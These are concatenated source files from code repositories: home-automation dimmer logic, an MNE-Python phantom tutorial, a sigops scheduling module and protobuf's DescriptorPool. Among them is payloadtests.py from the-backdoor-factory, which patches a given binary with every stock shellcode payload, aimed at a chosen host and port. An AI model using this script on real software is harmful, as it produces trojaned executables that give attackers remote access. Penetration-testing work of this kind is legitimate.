temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) class OffDimmerAction(DimmerAction): def __init__(self, trigger: ActionTrigger, delay: int, on_timer: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int, dimmer_speed: int, cancel_on_button_release: bool): self.__on_timer = on_timer super(OffDimmerAction, self).__init__(trigger, ActionType.OFF_DIMMER, delay, output_pins, notifications, condition, click_number, dimmer_speed, cancel_on_button_release) def perform_action(self, pin_to_dim: Dict[str, List[IndividualDimAction]]): temp_pin_actions = {} for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualDimAction(self._dimmer_speed, 0, self.delay, self._cancel_on_button_release) pin_action.add_pin(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) if self.__on_timer > 0: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualDimAction(self._dimmer_speed, 0, self.__on_timer, self._cancel_on_button_release) pin_action.add_pin(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) class ToggleDimmerAction(DimmerAction): def __init__(self, trigger: ActionTrigger, delay: int, output_pins: List[OutputPin], notifications: List[Notification], master: OutputPin, condition: Optional[Condition], click_number: int, dimmer_speed: int, dimmer_light_value: int, cancel_on_button_release: bool, master_dim_id: Optional[int]): super(ToggleDimmerAction, self).__init__(trigger, ActionType.TOGGLE_DIMMER, delay, output_pins, notifications, condition, click_number, dimmer_speed, cancel_on_button_release) self.master = master self.__dimmer_light_value = dimmer_light_value self.__master_dim_id = master_dim_id @property def master_dim_id(self) -> Optional[int]: return self.__master_dim_id def perform_action(self, pin_to_dim: Dict[str, List[IndividualDimAction]], last_light_values_to_update: Dict[int, int], master_state: int, master_direction: str, last_light_value: int): temp_pin_actions = {} # If master is off, start turning all lights on, regardless of button pressed or button longdown # If cancel_on_button_release is set to true and last dim direction was down, we start dimming up # If master_state is 100, start turning all lights off logger.debug(f"{master_state}, {self.cancel_on_button_release}, {master_direction}") if master_state == 0 or \ (self.cancel_on_button_release and master_direction == constants.dim_direction_down and master_state != 100): # If __dimmer_light_value is configured, use that value. 
Otherwise use the last known value light_value_to_set = self.__dimmer_light_value if light_value_to_set == -1: light_value_to_set = last_light_value logger.debug(f"{light_value_to_set}") # Generate dim actions for each impacted pin for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualDimAction(self._dimmer_speed, light_value_to_set, self.delay, self._cancel_on_button_release) pin_action.add_pin(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) # If master is on and cancel_on_button_release is false or last dim direction was up, we start dimming down else: if not self.cancel_on_button_release: last_light_values_to_update.setdefault(self.master_dim_id, master_state) for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualDimAction(self._dimmer_speed, 0, self.delay, self._cancel_on_button_release) pin_action.add_pin(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) class ArduinoConfig: """Represents the configuration of all known arduinos""" def __init__(self, arduinos: List[Arduino]): self.arduinos = arduinos
mit
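A minimal sketch wiring one button to one relay and collecting the switch commands an OnAction produces; the pin numbers, the "hall" name and the import path are illustrative and assume the package layout implied by the imports in the file header.

from src.button._domain import (Arduino, OutputPin, ButtonPin,
                                ImmediatelyActionTrigger, OnAction)

arduino = Arduino(name="hall", number_of_outputs_pins=16, number_of_button_pins=16)
relay = OutputPin(number=3, parent="hall")
arduino.set_output_pin(relay)

on_action = OnAction(trigger=ImmediatelyActionTrigger(), delay=0, off_timer=0,
                     output_pins=[relay], notifications=[], condition=None,
                     click_number=1)
button = ButtonPin(number=0, actions=[on_action], time_between_clicks=0.5)
arduino.set_button_pin(button)

pins_to_switch = {}            # Dict[str, List[IndividualAction]]
on_action.perform_action(pins_to_switch)
# pins_to_switch now maps "hall" to one IndividualAction whose pin_numbers_on
# contains pin 3; no delayed off action is queued because off_timer == 0.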
wmvanvliet/mne-python
tutorials/sample-datasets/plot_brainstorm_phantom_elekta.py
10
6588
# -*- coding: utf-8 -*- """ .. _tut-brainstorm-elekta-phantom: ========================================== Brainstorm Elekta phantom dataset tutorial ========================================== Here we compute the evoked from raw for the Brainstorm Elekta phantom tutorial dataset. For comparison, see :footcite:`TadelEtAl2011` and: https://neuroimage.usc.edu/brainstorm/Tutorials/PhantomElekta References ---------- .. footbibliography:: """ # sphinx_gallery_thumbnail_number = 9 # Authors: Eric Larson <[email protected]> # # License: BSD (3-clause) import os.path as op import numpy as np import matplotlib.pyplot as plt import mne from mne import find_events, fit_dipole from mne.datasets.brainstorm import bst_phantom_elekta from mne.io import read_raw_fif print(__doc__) ############################################################################### # The data were collected with an Elekta Neuromag VectorView system at 1000 Hz # and low-pass filtered at 330 Hz. Here the medium-amplitude (200 nAm) data # are read to construct instances of :class:`mne.io.Raw`. data_path = bst_phantom_elekta.data_path(verbose=True) subject = 'sample' raw_fname = op.join(data_path, 'kojak_all_200nAm_pp_no_chpi_no_ms_raw.fif') raw = read_raw_fif(raw_fname) ############################################################################### # Data channel array consisted of 204 MEG planor gradiometers, # 102 axial magnetometers, and 3 stimulus channels. Let's get the events # for the phantom, where each dipole (1-32) gets its own event: events = find_events(raw, 'STI201') raw.plot(events=events) raw.info['bads'] = ['MEG1933', 'MEG2421'] ############################################################################### # The data have strong line frequency (60 Hz and harmonics) and cHPI coil # noise (five peaks around 300 Hz). Here we plot only out to 60 seconds # to save memory: raw.plot_psd(tmax=30., average=False) ############################################################################### # Our phantom produces sinusoidal bursts at 20 Hz: raw.plot(events=events) ############################################################################### # Now we epoch our data, average it, and look at the first dipole response. # The first peak appears around 3 ms. Because we low-passed at 40 Hz, # we can also decimate our data to save memory. tmin, tmax = -0.1, 0.1 bmax = -0.05 # Avoid capture filter ringing into baseline event_id = list(range(1, 33)) epochs = mne.Epochs(raw, events, event_id, tmin, tmax, baseline=(None, bmax), preload=False) epochs['1'].average().plot(time_unit='s') ############################################################################### # .. _plt_brainstorm_phantom_elekta_eeg_sphere_geometry: # # Let's use a :ref:`sphere head geometry model <eeg_sphere_model>` # and let's see the coordinate alignment and the sphere location. The phantom # is properly modeled by a single-shell sphere with origin (0., 0., 0.). sphere = mne.make_sphere_model(r0=(0., 0., 0.), head_radius=0.08) mne.viz.plot_alignment(epochs.info, subject=subject, show_axes=True, bem=sphere, dig=True, surfaces='head') ############################################################################### # Let's do some dipole fits. We first compute the noise covariance, # then do the fits for each event_id taking the time instant that maximizes # the global field power. 
# here we can get away with using method='oas' for speed (faster than "shrunk") # but in general "shrunk" is usually better cov = mne.compute_covariance(epochs, tmax=bmax) mne.viz.plot_evoked_white(epochs['1'].average(), cov) data = [] t_peak = 0.036 # true for Elekta phantom for ii in event_id: # Avoid the first and last trials -- can contain dipole-switching artifacts evoked = epochs[str(ii)][1:-1].average().crop(t_peak, t_peak) data.append(evoked.data[:, 0]) evoked = mne.EvokedArray(np.array(data).T, evoked.info, tmin=0.) del epochs dip, residual = fit_dipole(evoked, cov, sphere, n_jobs=1) ############################################################################### # Do a quick visualization of how much variance we explained, putting the # data and residuals on the same scale (here the "time points" are the # 32 dipole peak values that we fit): fig, axes = plt.subplots(2, 1) evoked.plot(axes=axes) for ax in axes: ax.texts = [] for line in ax.lines: line.set_color('#98df81') residual.plot(axes=axes) ############################################################################### # Now we can compare to the actual locations, taking the difference in mm: actual_pos, actual_ori = mne.dipole.get_phantom_dipoles() actual_amp = 100. # nAm fig, (ax1, ax2, ax3) = plt.subplots(nrows=3, ncols=1, figsize=(6, 7)) diffs = 1000 * np.sqrt(np.sum((dip.pos - actual_pos) ** 2, axis=-1)) print('mean(position error) = %0.1f mm' % (np.mean(diffs),)) ax1.bar(event_id, diffs) ax1.set_xlabel('Dipole index') ax1.set_ylabel('Loc. error (mm)') angles = np.rad2deg(np.arccos(np.abs(np.sum(dip.ori * actual_ori, axis=1)))) print(u'mean(angle error) = %0.1f°' % (np.mean(angles),)) ax2.bar(event_id, angles) ax2.set_xlabel('Dipole index') ax2.set_ylabel(u'Angle error (°)') amps = actual_amp - dip.amplitude / 1e-9 print('mean(abs amplitude error) = %0.1f nAm' % (np.mean(np.abs(amps)),)) ax3.bar(event_id, amps) ax3.set_xlabel('Dipole index') ax3.set_ylabel('Amplitude error (nAm)') fig.tight_layout() plt.show() ############################################################################### # Let's plot the positions and the orientations of the actual and the estimated # dipoles actual_amp = np.ones(len(dip)) # misc amp to create Dipole instance actual_gof = np.ones(len(dip)) # misc GOF to create Dipole instance dip_true = \ mne.Dipole(dip.times, actual_pos, actual_amp, actual_ori, actual_gof) fig = mne.viz.plot_alignment(evoked.info, bem=sphere, surfaces='inner_skull', coord_frame='head', meg='helmet', show_axes=True) # Plot the position and the orientation of the actual dipole fig = mne.viz.plot_dipole_locations(dipoles=dip_true, mode='arrow', subject=subject, color=(0., 0., 0.), fig=fig) # Plot the position and the orientation of the estimated dipole fig = mne.viz.plot_dipole_locations(dipoles=dip, mode='arrow', subject=subject, color=(0.2, 1., 0.5), fig=fig) mne.viz.set_3d_view(figure=fig, azimuth=70, elevation=80, distance=0.5)
bsd-3-clause
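The phantom tutorial above summarizes fit quality with three metrics: position error in mm, orientation angle error in degrees, and amplitude error in nAm. A small sketch of those computations on synthetic values rather than a real dipole fit:
import numpy as np

est_pos = np.array([[0.01, 0.02, 0.05]])      # estimated positions (m)
true_pos = np.array([[0.012, 0.019, 0.051]])  # ground-truth positions (m)
est_ori = np.array([[0., 0., 1.]])            # unit orientation vectors
true_ori = np.array([[0., 0.1, 0.995]])
true_ori /= np.linalg.norm(true_ori, axis=1, keepdims=True)
est_amp_nam = np.array([92.])                 # estimated amplitudes (nAm)
true_amp_nam = 100.

pos_err_mm = 1000 * np.linalg.norm(est_pos - true_pos, axis=1)
# The absolute value makes the angle insensitive to a 180-degree dipole flip.
angle_err_deg = np.rad2deg(np.arccos(np.abs(np.sum(est_ori * true_ori, axis=1))))
amp_err_nam = np.abs(true_amp_nam - est_amp_nam)

print(pos_err_mm, angle_err_deg, amp_err_nam)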
uvbs/the-backdoor-factory
payloadtests.py
13
6022
#!/usr/bin/env python ''' Copyright (c) 2013-2015, Joshua Pitts All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ''' import pebin import machobin import elfbin import sys import os def basicDiscovery(FILE): macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe', '\xce\xfa\xed\xfe', ] testBinary = open(FILE, 'rb') header = testBinary.read(4) testBinary.close() if 'MZ' in header: return 'PE' elif 'ELF' in header: return 'ELF' elif header in macho_supported: return "MACHO" else: 'Only support ELF, PE, and MACH-O file formats' return None if __name__ == "__main__": ''' Will create patched binaries for each payload for the type of binary provided. Each payload has it's own port number. Usage: ./payloadtests.py file 127.0.0.1 8080 ''' if len(sys.argv) != 4: print "Will create patched binaries for each stock shellcode/payload for the " print "type of binary provided. Each payload type has it's own port number." print "Usage:" + str(sys.argv[0]) + " binary HOST PORT" sys.exit() file = sys.argv[1] host = sys.argv[2] port = int(sys.argv[3]) outputfiles = {} is_supported = basicDiscovery(file) if is_supported is "PE": patchtypes = ['APPEND', 'JUMP', 'SINGLE'] supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none') supported_file.run_this() #print supported_file.flItms['avail_shells'] for aShell in supported_file.flItms['avail_shells']: for patchtype in patchtypes: if 'cave_miner' in aShell or 'user_supplied' in aShell: continue aName = aShell + "." + patchtype + "." + str(host) + "." + str(port) + "." 
+ file print "Creating File:", aName if patchtype == 'APPEND': supported_file = pebin.pebin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port, ADD_SECTION=True) elif patchtype == 'JUMP': supported_file = pebin.pebin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port, CAVE_JUMPING=True) elif patchtype == 'SINGLE': supported_file = pebin.pebin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port, CAVE_JUMPING=False) result = supported_file.run_this() outputfiles[aName] = result port += 1 elif is_supported is "ELF": supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none') supported_file.run_this() for aShell in supported_file.avail_shells: if 'cave_miner' in aShell or 'user_supplied' in aShell: continue aName = aShell + "." + str(host) + "." + str(port) + "." + file print "Creating File:", aName supported_file = elfbin.elfbin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port) result = supported_file.run_this() outputfiles[aName] = result port += 1 elif is_supported is "MACHO": supported_file = machobin.machobin(FILE=file, OUTPUT=None, SHELL='none') supported_file.run_this() for aShell in supported_file.avail_shells: if 'cave_miner' in aShell or 'user_supplied' in aShell: continue aName = aShell + "." + str(host) + "." + str(port) + "." + file print "Creating File:", aName supported_file = machobin.machobin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port, FAT_PRIORITY='ALL') result = supported_file.run_this() outputfiles[aName] = result port += 1 print "Successful files are in backdoored:" for afile, aresult in outputfiles.iteritems(): if aresult is True: print afile, 'Success' else: print afile, 'Fail' os.remove('backdoored/' + afile)
bsd-3-clause
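payloadtests.py classifies the input binary by reading its first four bytes and matching PE, ELF, or Mach-O magic numbers. A Python 3 sketch of the same header check (the script above is Python 2 and compares text strings; byte literals are used here instead):
MACHO_MAGICS = {
    b'\xcf\xfa\xed\xfe',  # 64-bit Mach-O, little-endian
    b'\xce\xfa\xed\xfe',  # 32-bit Mach-O, little-endian
    b'\xca\xfe\xba\xbe',  # fat/universal binary
}


def detect_format(path):
    # Read only the first four bytes and classify by magic number.
    with open(path, 'rb') as fh:
        header = fh.read(4)
    if header.startswith(b'MZ'):
        return 'PE'
    if header == b'\x7fELF':
        return 'ELF'
    if header in MACHO_MAGICS:
        return 'MACHO'
    return None


if __name__ == '__main__':
    import sys
    print(detect_format(sys.argv[1]))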
jaberg/sigops
sigops/operator.py
1
6049
import numpy as np import itertools from collections import defaultdict import numpy as np import networkx as nx def is_op(thing): try: return thing._is_sigops_operator except AttributeError: return False class Operator(object): """Base class for operator instances understood by nengo.Simulator. The lifetime of a Signal during one simulator timestep: 0) at most one set operator (optional) 1) any number of increments 2) any number of reads 3) at most one update A signal that is only read can be considered a "constant". A signal that is both set *and* updated can be a problem: since reads must come after the set, and the set will destroy whatever were the contents of the update, it can be the case that the update is completely hidden and rendered irrelevant. There are however at least two reasons to use both a set and an update: (a) to use a signal as scratch space (updating means destroying it) (b) to use sets and updates on partly overlapping views of the same memory. N.B.: It is done on purpose that there are no default values for reads, sets, incs, and updates. Each operator should explicitly set each of these properties. """ _is_sigops_operator = True @property def reads(self): """Signals that are read and not modified""" return self._reads @reads.setter def reads(self, val): self._reads = val @property def sets(self): """Signals assigned by this operator A signal that is set here cannot be set or updated by any other operator. """ return self._sets @sets.setter def sets(self, val): self._sets = val @property def incs(self): """Signals incremented by this operator Increments will be applied after this signal has been set (if it is set), and before reads. """ return self._incs @incs.setter def incs(self, val): self._incs = val @property def updates(self): """Signals assigned their value for time t + 1 This operator will be scheduled so that updates appear after all sets, increments and reads of this signal. """ return self._updates @updates.setter def updates(self, val): self._updates = val @property def all_signals(self): return self.reads + self.sets + self.incs + self.updates def init_signals(self, signals): """ Install any buffers into the signals view that this operator will need. Classes for nonlinearities that use extra buffers should create them here. 
""" for sig in self.all_signals: if sig.base not in signals: signals[sig.base] = np.asarray( np.zeros(sig.base.shape, dtype=sig.base.dtype) + sig.base.value) def depgraph(operators, verbose=False): dg = nx.DiGraph() for op in operators: dg.add_edges_from(itertools.product(op.reads + op.updates, [op])) dg.add_edges_from(itertools.product([op], op.sets + op.incs)) # -- all views of a base object in a particular dictionary by_base_writes = defaultdict(list) by_base_reads = defaultdict(list) reads = defaultdict(list) sets = defaultdict(list) incs = defaultdict(list) ups = defaultdict(list) for op in operators: for node in op.sets + op.incs: by_base_writes[node.base].append(node) for node in op.reads: by_base_reads[node.base].append(node) for node in op.reads: reads[node].append(op) for node in op.sets: sets[node].append(op) for node in op.incs: incs[node].append(op) for node in op.updates: ups[node].append(op) # -- assert that only one op sets any particular view for node in sets: assert len(sets[node]) == 1, (node, sets[node]) # -- assert that only one op updates any particular view for node in ups: assert len(ups[node]) == 1, (node, ups[node]) # --- assert that any node that is incremented is also set/updated for node in incs: assert len(sets[node] + ups[node]) > 0, (node) # -- assert that no two views are both set and aliased if len(sets) >= 2: for node, other in itertools.combinations(sets, 2): assert not node.shares_memory_with(other), \ ("%s shares memory with %s" % (node, other)) # -- assert that no two views are both updated and aliased if len(ups) >= 2: for node, other in itertools.combinations(ups, 2): assert not node.shares_memory_with(other), (node, other) # -- Scheduling algorithm for serial evaluation: # 1) All sets on a given base signal # 2) All incs on a given base signal # 3) All reads on a given base signal # 4) All updates on a given base signal # -- incs depend on sets for node, post_ops in incs.items(): pre_ops = list(sets[node]) for other in by_base_writes[node.base]: pre_ops += sets[other] dg.add_edges_from(itertools.product(set(pre_ops), post_ops)) # -- reads depend on writes (sets and incs) for node, post_ops in reads.items(): pre_ops = sets[node] + incs[node] for other in by_base_writes[node.base]: pre_ops += sets[other] + incs[other] dg.add_edges_from(itertools.product(set(pre_ops), post_ops)) # -- updates depend on reads, sets, and incs. for node, post_ops in ups.items(): pre_ops = sets[node] + incs[node] + reads[node] for other in by_base_writes[node.base]: pre_ops += sets[other] + incs[other] + reads[other] for other in by_base_reads[node.base]: pre_ops += sets[other] + incs[other] + reads[other] dg.add_edges_from(itertools.product(set(pre_ops), post_ops)) return dg
bsd-2-clause
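The operator docstring above defines four signal-access categories (sets, incs, reads, updates) from which the dependency graph is built. Below is a hypothetical operator declaring them explicitly; it assumes the module above is importable as sigops.operator, and the simulator's step-function machinery is intentionally left out.
from sigops.operator import Operator


class Copy(Operator):
    """Overwrite dst with the current value of src at each step."""

    def __init__(self, dst, src):
        self.dst = dst
        self.src = src
        # Each category is set explicitly, as the base class requires.
        self.sets = [dst]      # dst is assigned by this operator
        self.incs = []         # nothing is incremented
        self.reads = [src]     # src is only read
        self.updates = []      # nothing is scheduled for time t + 1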
javier-ruiz-b/docker-rasppi-images
raspberry-google-home/env/lib/python3.7/site-packages/google/protobuf/descriptor_pool.py
20
46541
# Protocol Buffers - Google's data interchange format # Copyright 2008 Google Inc. All rights reserved. # https://developers.google.com/protocol-buffers/ # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Provides DescriptorPool to use as a container for proto2 descriptors. The DescriptorPool is used in conjection with a DescriptorDatabase to maintain a collection of protocol buffer descriptors for use when dynamically creating message types at runtime. For most applications protocol buffers should be used via modules generated by the protocol buffer compiler tool. This should only be used when the type of protocol buffers used in an application or library cannot be predetermined. Below is a straightforward example on how to use this class:: pool = DescriptorPool() file_descriptor_protos = [ ... ] for file_descriptor_proto in file_descriptor_protos: pool.Add(file_descriptor_proto) my_message_descriptor = pool.FindMessageTypeByName('some.package.MessageType') The message descriptor can be used in conjunction with the message_factory module in order to create a protocol buffer class that can be encoded and decoded. If you want to get a Python class for the specified proto, use the helper functions inside google.protobuf.message_factory directly instead of this class. """ __author__ = '[email protected] (Matt Toia)' import collections import warnings from google.protobuf import descriptor from google.protobuf import descriptor_database from google.protobuf import text_encoding _USE_C_DESCRIPTORS = descriptor._USE_C_DESCRIPTORS # pylint: disable=protected-access def _Deprecated(func): """Mark functions as deprecated.""" def NewFunc(*args, **kwargs): warnings.warn( 'Call to deprecated function %s(). Note: Do add unlinked descriptors ' 'to descriptor_pool is wrong. Use Add() or AddSerializedFile() ' 'instead.' % func.__name__, category=DeprecationWarning) return func(*args, **kwargs) NewFunc.__name__ = func.__name__ NewFunc.__doc__ = func.__doc__ NewFunc.__dict__.update(func.__dict__) return NewFunc def _NormalizeFullyQualifiedName(name): """Remove leading period from fully-qualified type name. 
Due to b/13860351 in descriptor_database.py, types in the root namespace are generated with a leading period. This function removes that prefix. Args: name (str): The fully-qualified symbol name. Returns: str: The normalized fully-qualified symbol name. """ return name.lstrip('.') def _OptionsOrNone(descriptor_proto): """Returns the value of the field `options`, or None if it is not set.""" if descriptor_proto.HasField('options'): return descriptor_proto.options else: return None def _IsMessageSetExtension(field): return (field.is_extension and field.containing_type.has_options and field.containing_type.GetOptions().message_set_wire_format and field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and field.label == descriptor.FieldDescriptor.LABEL_OPTIONAL) class DescriptorPool(object): """A collection of protobufs dynamically constructed by descriptor protos.""" if _USE_C_DESCRIPTORS: def __new__(cls, descriptor_db=None): # pylint: disable=protected-access return descriptor._message.DescriptorPool(descriptor_db) def __init__(self, descriptor_db=None): """Initializes a Pool of proto buffs. The descriptor_db argument to the constructor is provided to allow specialized file descriptor proto lookup code to be triggered on demand. An example would be an implementation which will read and compile a file specified in a call to FindFileByName() and not require the call to Add() at all. Results from this database will be cached internally here as well. Args: descriptor_db: A secondary source of file descriptors. """ self._internal_db = descriptor_database.DescriptorDatabase() self._descriptor_db = descriptor_db self._descriptors = {} self._enum_descriptors = {} self._service_descriptors = {} self._file_descriptors = {} self._toplevel_extensions = {} # TODO(jieluo): Remove _file_desc_by_toplevel_extension after # maybe year 2020 for compatibility issue (with 3.4.1 only). self._file_desc_by_toplevel_extension = {} self._top_enum_values = {} # We store extensions in two two-level mappings: The first key is the # descriptor of the message being extended, the second key is the extension # full name or its tag number. self._extensions_by_name = collections.defaultdict(dict) self._extensions_by_number = collections.defaultdict(dict) def _CheckConflictRegister(self, desc, desc_name, file_name): """Check if the descriptor name conflicts with another of the same name. Args: desc: Descriptor of a message, enum, service, extension or enum value. desc_name (str): the full name of desc. file_name (str): The file name of descriptor. """ for register, descriptor_type in [ (self._descriptors, descriptor.Descriptor), (self._enum_descriptors, descriptor.EnumDescriptor), (self._service_descriptors, descriptor.ServiceDescriptor), (self._toplevel_extensions, descriptor.FieldDescriptor), (self._top_enum_values, descriptor.EnumValueDescriptor)]: if desc_name in register: old_desc = register[desc_name] if isinstance(old_desc, descriptor.EnumValueDescriptor): old_file = old_desc.type.file.name else: old_file = old_desc.file.name if not isinstance(desc, descriptor_type) or ( old_file != file_name): error_msg = ('Conflict register for file "' + file_name + '": ' + desc_name + ' is already defined in file "' + old_file + '". 
Please fix the conflict by adding ' 'package name on the proto file, or use different ' 'name for the duplication.') if isinstance(desc, descriptor.EnumValueDescriptor): error_msg += ('\nNote: enum values appear as ' 'siblings of the enum type instead of ' 'children of it.') raise TypeError(error_msg) return def Add(self, file_desc_proto): """Adds the FileDescriptorProto and its types to this pool. Args: file_desc_proto (FileDescriptorProto): The file descriptor to add. """ self._internal_db.Add(file_desc_proto) def AddSerializedFile(self, serialized_file_desc_proto): """Adds the FileDescriptorProto and its types to this pool. Args: serialized_file_desc_proto (bytes): A bytes string, serialization of the :class:`FileDescriptorProto` to add. """ # pylint: disable=g-import-not-at-top from google.protobuf import descriptor_pb2 file_desc_proto = descriptor_pb2.FileDescriptorProto.FromString( serialized_file_desc_proto) self.Add(file_desc_proto) # Add Descriptor to descriptor pool is dreprecated. Please use Add() # or AddSerializedFile() to add a FileDescriptorProto instead. @_Deprecated def AddDescriptor(self, desc): self._AddDescriptor(desc) # Never call this method. It is for internal usage only. def _AddDescriptor(self, desc): """Adds a Descriptor to the pool, non-recursively. If the Descriptor contains nested messages or enums, the caller must explicitly register them. This method also registers the FileDescriptor associated with the message. Args: desc: A Descriptor. """ if not isinstance(desc, descriptor.Descriptor): raise TypeError('Expected instance of descriptor.Descriptor.') self._CheckConflictRegister(desc, desc.full_name, desc.file.name) self._descriptors[desc.full_name] = desc self._AddFileDescriptor(desc.file) # Add EnumDescriptor to descriptor pool is dreprecated. Please use Add() # or AddSerializedFile() to add a FileDescriptorProto instead. @_Deprecated def AddEnumDescriptor(self, enum_desc): self._AddEnumDescriptor(enum_desc) # Never call this method. It is for internal usage only. def _AddEnumDescriptor(self, enum_desc): """Adds an EnumDescriptor to the pool. This method also registers the FileDescriptor associated with the enum. Args: enum_desc: An EnumDescriptor. """ if not isinstance(enum_desc, descriptor.EnumDescriptor): raise TypeError('Expected instance of descriptor.EnumDescriptor.') file_name = enum_desc.file.name self._CheckConflictRegister(enum_desc, enum_desc.full_name, file_name) self._enum_descriptors[enum_desc.full_name] = enum_desc # Top enum values need to be indexed. # Count the number of dots to see whether the enum is toplevel or nested # in a message. We cannot use enum_desc.containing_type at this stage. if enum_desc.file.package: top_level = (enum_desc.full_name.count('.') - enum_desc.file.package.count('.') == 1) else: top_level = enum_desc.full_name.count('.') == 0 if top_level: file_name = enum_desc.file.name package = enum_desc.file.package for enum_value in enum_desc.values: full_name = _NormalizeFullyQualifiedName( '.'.join((package, enum_value.name))) self._CheckConflictRegister(enum_value, full_name, file_name) self._top_enum_values[full_name] = enum_value self._AddFileDescriptor(enum_desc.file) # Add ServiceDescriptor to descriptor pool is dreprecated. Please use Add() # or AddSerializedFile() to add a FileDescriptorProto instead. @_Deprecated def AddServiceDescriptor(self, service_desc): self._AddServiceDescriptor(service_desc) # Never call this method. It is for internal usage only. 
def _AddServiceDescriptor(self, service_desc): """Adds a ServiceDescriptor to the pool. Args: service_desc: A ServiceDescriptor. """ if not isinstance(service_desc, descriptor.ServiceDescriptor): raise TypeError('Expected instance of descriptor.ServiceDescriptor.') self._CheckConflictRegister(service_desc, service_desc.full_name, service_desc.file.name) self._service_descriptors[service_desc.full_name] = service_desc # Add ExtensionDescriptor to descriptor pool is dreprecated. Please use Add() # or AddSerializedFile() to add a FileDescriptorProto instead. @_Deprecated def AddExtensionDescriptor(self, extension): self._AddExtensionDescriptor(extension) # Never call this method. It is for internal usage only. def _AddExtensionDescriptor(self, extension): """Adds a FieldDescriptor describing an extension to the pool. Args: extension: A FieldDescriptor. Raises: AssertionError: when another extension with the same number extends the same message. TypeError: when the specified extension is not a descriptor.FieldDescriptor. """ if not (isinstance(extension, descriptor.FieldDescriptor) and extension.is_extension): raise TypeError('Expected an extension descriptor.') if extension.extension_scope is None: self._toplevel_extensions[extension.full_name] = extension try: existing_desc = self._extensions_by_number[ extension.containing_type][extension.number] except KeyError: pass else: if extension is not existing_desc: raise AssertionError( 'Extensions "%s" and "%s" both try to extend message type "%s" ' 'with field number %d.' % (extension.full_name, existing_desc.full_name, extension.containing_type.full_name, extension.number)) self._extensions_by_number[extension.containing_type][ extension.number] = extension self._extensions_by_name[extension.containing_type][ extension.full_name] = extension # Also register 